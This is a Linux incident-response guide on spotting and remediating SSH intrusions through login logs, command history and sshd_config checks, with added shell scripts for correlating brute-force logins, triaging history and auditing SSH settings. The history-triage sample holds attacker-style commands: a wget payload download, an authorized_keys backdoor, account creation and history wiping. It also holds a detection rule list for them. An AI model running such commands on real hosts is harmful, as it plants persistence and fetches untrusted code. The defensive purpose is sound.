Detect and Respond to Linux Server Intrusions with Log Analysis

This guide walks you through using Linux login-log tools such as last, lastb and grep, together with the sshd_config file, to identify suspicious logins, trace malicious IPs, and apply immediate remediation steps on a compromised server. It targets ops engineers and developers.

Efficient Ops

1. View recent login records (last command)

Use the last command to list recent successful logins, showing user, time, source IP and login method.

last -n 20  # show the latest 20 entries
last -f /var/log/wtmp  # specify the wtmp log file

Check usernames (e.g., root, admin, unknown accounts)

Check login times (odd hours, non‑working periods)

Check source IP addresses

Check login methods (SSH pts/X)

Example output:

root pts/0 192.168.1.100 Thu Apr 11 10:15 still logged in
hacker pts/1 45.76.123.89 Thu Apr 11 09:55 - 10:05 (00:10)

2. View failed login attempts (lastb)

The lastb command shows all failed login attempts, useful for spotting brute‑force attacks.

lastb | head -n 20  # show the most recent 20 failures

Repeated failures from the same IP often indicate a brute‑force attempt:

banned ssh:notty 103.20.45.89 Thu Apr 11 09:50-09:51 (00:01)

3. Inspect SSH logs (/var/log/secure or /var/log/auth.log)

3.1 Find successful logins

grep "Accepted" /var/log/secure   # CentOS/RHEL
grep "Accepted" /var/log/auth.log # Ubuntu/Debian

Sample output:

Apr 11 10:15:00 server sshd[1234]: Accepted password for root from 45.76.123.89 port 45678 ssh2

3.2 Find failed logins

grep "Failed password" /var/log/secure
grep "Failed password" /var/log/auth.log
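The grep commands in sections 2, 3.1 and 3.2 answer one question at a time. During an incident the question that matters most is the combination: did an IP that had been brute-forcing the host eventually log in successfully? The script below is an added example, not code from the original article; it parses the same "Failed password" and "Accepted" line formats shown above, counts failures per source IP, and flags every successful login whose source IP had reached a failure threshold. The log lines it reads are constructed for the example (the 45.76.123.89 address is the one the article uses; 203.0.113.7 and the threshold value are assumptions); point it at /var/log/secure or /var/log/auth.log on a real host.

```shell
#!/bin/sh
# Added example (not from the original article): correlate sshd "Failed password"
# and "Accepted" events from an auth log. Failures are counted per source IP and
# any successful login from an IP that reached THRESHOLD failures is reported.

THRESHOLD=${THRESHOLD:-5}   # assumption: 5 failures before a success is suspicious

# Constructed sample auth log; replace with /var/log/secure or /var/log/auth.log.
SAMPLE_LOG=$(mktemp)
trap 'rm -f "$SAMPLE_LOG"' EXIT
cat > "$SAMPLE_LOG" <<'EOF'
Apr 11 09:50:01 server sshd[1201]: Failed password for root from 45.76.123.89 port 40001 ssh2
Apr 11 09:50:03 server sshd[1202]: Failed password for root from 45.76.123.89 port 40002 ssh2
Apr 11 09:50:05 server sshd[1203]: Failed password for invalid user admin from 45.76.123.89 port 40003 ssh2
Apr 11 09:50:07 server sshd[1204]: Failed password for root from 45.76.123.89 port 40004 ssh2
Apr 11 09:50:09 server sshd[1205]: Failed password for root from 45.76.123.89 port 40005 ssh2
Apr 11 09:50:11 server sshd[1206]: Failed password for root from 45.76.123.89 port 40006 ssh2
Apr 11 09:51:00 server sshd[1210]: Failed password for deploy from 203.0.113.7 port 50001 ssh2
Apr 11 09:55:00 server sshd[1234]: Accepted password for root from 45.76.123.89 port 45678 ssh2
Apr 11 10:15:00 server sshd[1300]: Accepted publickey for deploy from 192.168.1.100 port 51000 ssh2
EOF

# Count "Failed password" events per source IP, most frequent first.
# The regex also covers the "invalid user NAME" variant sshd logs for unknown accounts.
failed_by_ip() {
    sed -n 's/.*Failed password for .* from \([0-9.]*\) port .*/\1/p' "$1" \
        | sort | uniq -c | sort -rn
}

# Print "user ip method" for every successful login (method: password or publickey).
accepted_logins() {
    sed -n 's/.*Accepted \([a-z]*\) for \([^ ]*\) from \([0-9.]*\) port .*/\2 \3 \1/p' "$1"
}

# IPs whose failure count reached the threshold given as $2.
brute_force_ips() {
    failed_by_ip "$1" | awk -v t="$2" '$1 >= t { print $2 }'
}

# Successful logins from brute-forcing IPs, as "user ip method failures".
suspicious_successes() {
    _log=$1; _t=$2
    accepted_logins "$_log" | while read -r user ip method; do
        n=$(failed_by_ip "$_log" | awk -v ip="$ip" '$2 == ip { print $1 }')
        if [ -n "$n" ] && [ "$n" -ge "$_t" ]; then
            echo "$user $ip $method $n"
        fi
    done
}

echo "== failures per source IP =="
failed_by_ip "$SAMPLE_LOG"
echo "== successful logins from IPs with >= $THRESHOLD failures =="
suspicious_successes "$SAMPLE_LOG" "$THRESHOLD"
```

A hit from suspicious_successes is the strongest signal in this whole checklist: the same IP failed repeatedly and then got in, so treat that account and session as compromised rather than as a false positive from a forgotten password.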

3.3 Find remote root sessions

grep "session opened" /var/log/secure | grep "root"

4. List currently logged‑in users (who / w)

who
w

Unexpected usernames such as hacker or test123 suggest the system may be compromised.

5. Verify SSH configuration integrity

Check whether the SSH daemon configuration has been altered to loosen security:

grep PermitRootLogin /etc/ssh/sshd_config

Recommended setting:

PermitRootLogin no

6. Review command history (.bash_history)

tail -n 50 ~/.bash_history

Look for suspicious actions such as downloading scripts with wget or curl, changing permissions to 777, adding users, or planting backdoors.
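Reading a long history by eye misses things, so the script below turns the indicators listed above into a small rule table and reports each matching history line with its line number and the rule that fired. It is an added example, not code from the original article; the rule names, regexes and the sample history are constructed (203.0.113.50 is a documentation address, not a real host). Run it against ~/.bash_history or /root/.bash_history on a real system, and extend the RULES table with your own patterns.

```shell
#!/bin/sh
# Added example (not from the original article): triage a shell history file for
# the actions the article lists (wget/curl downloads, chmod 777, new accounts,
# backdoor persistence) plus attempts to wipe the history itself.

# Constructed sample history; replace with ~/.bash_history in practice.
SAMPLE_HISTORY=$(mktemp)
trap 'rm -f "$SAMPLE_HISTORY"' EXIT
cat > "$SAMPLE_HISTORY" <<'EOF'
ls -la
cd /tmp
wget http://203.0.113.50/x.sh
chmod 777 x.sh
useradd -m test123
echo "ssh-rsa AAAA... attacker" >> /root/.ssh/authorized_keys
crontab -e
history -c
EOF

# Rule table: "<label> <extended-regex>", one rule per line (assumed rule set).
# Matched with grep -Ew so "curl" does not fire on "curlicue" and similar.
RULES='download (wget|curl)
world-writable chmod[[:space:]]+(-R[[:space:]]+)?777
new-account (useradd|adduser)
ssh-backdoor authorized_keys
persistence (crontab|rc\.local|systemctl[[:space:]]+enable)
history-wipe (history[[:space:]]+-c|unset[[:space:]]+HISTFILE)'

# Print "lineno<TAB>label<TAB>command" for every history line a rule matches,
# ordered by line number so the sequence of actions is easy to follow.
triage_history() {
    _file=$1
    printf '%s\n' "$RULES" | while read -r label regex; do
        grep -Enw -- "$regex" "$_file" | while IFS=: read -r lineno cmd; do
            printf '%s\t%s\t%s\n' "$lineno" "$label" "$cmd"
        done
    done | sort -n
}

# Number of history lines that matched at least one rule.
triage_count() {
    triage_history "$1" | cut -f1 | sort -u | wc -l | tr -d ' '
}

echo "== suspicious history entries =="
triage_history "$SAMPLE_HISTORY"
echo "== $(triage_count "$SAMPLE_HISTORY") flagged line(s) =="
```

Two caveats when reading the result: bash writes history only when a session ends, so the most recent attacker session may not be on disk yet, and an empty or truncated history file is itself a finding, since an intruder who ran history -c or unset HISTFILE has removed the evidence this step relies on.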

7. Trace suspicious IPs (whois / ping)

whois 45.76.123.89
ping -c 4 45.76.123.89

Optionally query AbuseIPDB for reputation. The v2 API requires an API key sent in the Key header (here read from an ABUSEIPDB_KEY environment variable you set beforehand); without it the request is rejected:

curl -s -G https://api.abuseipdb.com/api/v2/check --data-urlencode "ipAddress=45.76.123.89" -H "Key: $ABUSEIPDB_KEY" -H "Accept: application/json"

8. Immediate remediation steps

8.1 Block the malicious IP

iptables -A INPUT -s 45.76.123.89 -j DROP   # iptables: takes effect immediately, lost on reboot unless saved
firewall-cmd --add-rich-rule='rule family="ipv4" source address="45.76.123.89" reject' --permanent   # firewalld (CentOS/RHEL)
firewall-cmd --reload   # a --permanent rule is only applied after a reload
fail2ban-client set sshd banip 45.76.123.89   # fail2ban, if the sshd jail is enabled

8.2 Harden SSH configuration

vim /etc/ssh/sshd_config

Recommended settings (edit these lines in sshd_config):

Port 2222
PermitRootLogin no

Then restart the daemon so the change takes effect:

systemctl restart sshd
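Sections 5 and 8.2 both come down to the same question: what is the effective sshd setting, and does it match the baseline? A detail that bites here is that sshd honours the first active occurrence of a keyword, so a "PermitRootLogin no" added below an attacker's earlier "PermitRootLogin yes" changes nothing. The checker below is an added example, not code from the original article; it resolves each keyword with that first-match rule, compares the result against a small baseline, and returns the number of findings. The sample sshd_config is constructed, the baseline (PermitRootLogin, PasswordAuthentication, PubkeyAuthentication, non-default Port) is an assumption, and Match blocks are out of scope.

```shell
#!/bin/sh
# Added example (not from the original article): audit an sshd_config file
# against a small hardening baseline, honouring sshd's first-match rule.
# Assumptions: no Match blocks, keyword and value separated by whitespace.

# Constructed sshd_config with a stale override left above the hardened line.
SAMPLE_CFG=$(mktemp)
trap 'rm -f "$SAMPLE_CFG"' EXIT
cat > "$SAMPLE_CFG" <<'EOF'
# constructed sample sshd_config
Port 22
PermitRootLogin yes
#PasswordAuthentication no
PermitRootLogin no
PubkeyAuthentication yes
EOF

# Effective value of KEY in FILE: the first uncommented occurrence wins,
# keywords are case-insensitive, and "unset" means sshd's built-in default
# applies (for PasswordAuthentication that default is yes, so an explicit
# "no" is required).
sshd_setting() {
    _file=$1; _key=$2
    _val=$(awk -v key="$_key" '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
        tolower($1) == tolower(key) { print $2; exit }
    ' "$_file")
    echo "${_val:-unset}"
}

# Compare FILE against the baseline. Prints one "KEY expected=... actual=..."
# line per finding and returns the number of findings (0 means compliant).
audit_sshd_config() {
    _file=$1; _findings=0
    for pair in PermitRootLogin=no PasswordAuthentication=no PubkeyAuthentication=yes; do
        key=${pair%%=*}; want=${pair#*=}
        have=$(sshd_setting "$_file" "$key")
        if [ "$have" != "$want" ]; then
            echo "$key expected=$want actual=$have"
            _findings=$((_findings + 1))
        fi
    done
    # The article recommends a non-default port; 22 or unset (default 22) is a finding.
    port=$(sshd_setting "$_file" Port)
    if [ "$port" = "22" ] || [ "$port" = "unset" ]; then
        echo "Port expected=non-default actual=$port"
        _findings=$((_findings + 1))
    fi
    return "$_findings"
}

echo "== audit of $SAMPLE_CFG =="
audit_sshd_config "$SAMPLE_CFG" || echo "$? finding(s); fix them and run 'sshd -t' before restarting sshd"
```

On a live host, compare the result with sshd -T (which prints the daemon's own view of the effective configuration) before restarting: a config that fails sshd -t will leave you locked out if the restart goes through.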

8.3 Forcefully disconnect suspicious users

pkill -u hacker

8.4 Lock high‑risk accounts

usermod -L hacker

8.5 Reset all passwords

passwd root

8.6 Apply system and security updates

yum update -y   # CentOS
apt update && apt upgrade -y   # Ubuntu/Debian

9. Summary and recommendations

When a server is compromised, the first step is not to reinstall but to investigate the intrusion path and eliminate the foothold. Using built‑in commands such as last, lastb, grep, who, and reviewing .bash_history enables rapid identification of malicious logins and actions.

If the system is fully controlled, back up critical data, reinstall the OS on a trusted platform, and enforce hardened security measures:

Disable root remote login

Use a non‑default SSH port

Enable fail2ban and firewall policies

Prefer key‑based authentication over passwords

Regularly audit login logs and account activity

Tags: Linux, incident response, log analysis, SSH, forensics
Written by

Efficient Ops

This public account is maintained by Xiaotianguo and friends, regularly publishing widely-read original technical articles. We focus on operations transformation and accompany you throughout your operations career, growing together happily.
